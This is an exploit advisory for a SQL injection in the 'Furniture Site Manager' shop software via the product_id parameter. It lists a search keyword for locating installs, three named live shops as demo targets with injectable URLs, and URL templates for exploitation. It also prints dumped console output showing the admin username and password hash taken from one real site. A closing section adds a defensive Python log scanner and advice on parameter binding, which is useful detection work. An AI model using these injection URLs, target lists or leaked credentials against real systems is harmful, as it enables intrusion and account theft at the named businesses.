Furniture Site Manager => Remote (product_id) SQL Injection Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr (onlymail)
[~] HomePage : http://h4x0resec.blogspot.com - http://cyber-warrior.org
[~] GREETZ : DaiMon,BARCOD3_UnDeRTaKeR_
[Say]: How have you been, guys? xoron, I'm sure you still follow these parts. Drop by and say hello now and then, don't make us miss you :)
{Know that we're back from the trip...}
{THE H4X0RE SECURITY PROJECT continues!!} (Turkey)
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Furniture Site Manager
|~Price : N/A
|~Software: https://www.balcom-vetillo.com/furniture-site-manager/ - https://www.furnituresitemanager.com/
|~Vulnerability Style : SQL Injection
|~Vulnerability Dir : /
|~Keyword : "Powered By Furniture Site Manager"
|[~]Date : "27.AG.2014"
|[~]Tested on : (L):Kali Linux, Windows XP (R):Apache, PHP 5.4.31, MySQL 5
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Demos:
http://finestfurniture.com/index.php?route=product/product&path=69&product_id=29880' AAAAAAAAAAAAAAA
http://lakeknoxvillefurnitureco.com/index.php?route=product/product&product_id=36398' AAAAAAAAAAAAAAAA
http://curlysfurniture.com/index.php?route=product/product&path=68&product_id=7171' AAAAAAAAAAAAAAAA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============================================================
|{~~~~~~~~ Exploitation| SQL Injection~~~~~~~~~~~}|
http://$Site/$path/index.php?route=product/product&path=[true ID]&product_id=[true ID]' {SQL Injection}
http://$Site/$path/index.php?route=product/product&product_id=[true ID]' {SQL Injection}
Ex; http://curlysfurniture.com
[~] SQL Injecting..
http://curlysfurniture.com/index.php?route=product/product&path=68&product_id=7171' //SQL Command
the console
...
[20:56:26] [INFO] fetching columns 'user_id=1, password, username' for table 'oc_user' in database 'curlysfurniture'
[20:56:26] [INFO] the SQL query used returns 2 entries
[20:56:26] [INFO] resumed: username
[20:56:26] [INFO] resumed: varchar(20)
[20:56:26] [INFO] resumed: password
[20:56:26] [INFO] resumed: varchar(40)
[20:56:26] [INFO] fetching entries of column(s) 'password, username' for table 'oc_user' in database 'curlysfurniture'
[20:56:26] [INFO] the SQL query used returns 1 entries
[20:56:26] [INFO] resumed: 749ec92d59aada28cd05de30b8e23aef92b8221c
[20:56:26] [INFO] resumed: admin
...
...
...
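As an added defensive example, not part of the original advisory, the Python check below scans web-server access logs for requests whose `product_id` or `path` value is anything other than a plain integer, which is exactly the shape of the injection point above. The log lines are constructed samples, and the parameter list and the `suspicious_params`/`scan_log` names are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample Apache combined-log lines (not taken from the advisory).
SAMPLE_LOG = """\
203.0.113.10 - - [27/Aug/2014:20:56:26 +0300] "GET /index.php?route=product/product&path=68&product_id=7171 HTTP/1.1" 200 5120
203.0.113.10 - - [27/Aug/2014:20:56:27 +0300] "GET /index.php?route=product/product&path=68&product_id=7171%27%20AAAA HTTP/1.1" 500 312
203.0.113.11 - - [27/Aug/2014:20:56:30 +0300] "GET /index.php?route=product/product&product_id=29880'%20AND%201=1 HTTP/1.1" 200 5120
203.0.113.12 - - [27/Aug/2014:20:57:01 +0300] "GET /image/cache/logo.png HTTP/1.1" 200 2048
"""

# Request line of the combined log format: client, timestamp, method, URL, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)

# Query parameters the application treats as numeric IDs (assumed for this example).
INT_PARAMS = ("product_id", "path")


def suspicious_params(url):
    """Return (name, decoded value) pairs whose value is not a plain non-negative integer.

    parse_qs percent-decodes the values, so both a literal quote and %27 are caught.
    """
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return [(name, value) for name in INT_PARAMS
            for value in qs.get(name, []) if not value.isdigit()]


def scan_log(text):
    """Return one finding per request carrying a non-numeric ID parameter."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not well-formed request records
        hits = suspicious_params(m["url"])
        if hits:
            findings.append({"ip": m["ip"], "ts": m["ts"],
                             "status": int(m["status"]), "params": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["status"], f["params"])
```

The same `isdigit()` rule applied server side (casting `product_id` to an integer, or binding it as a parameter of a prepared statement) removes the injection point entirely; the log scan is for finding attempts that reached an unpatched install.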
=============================================================
goodluck. greetz TURKEY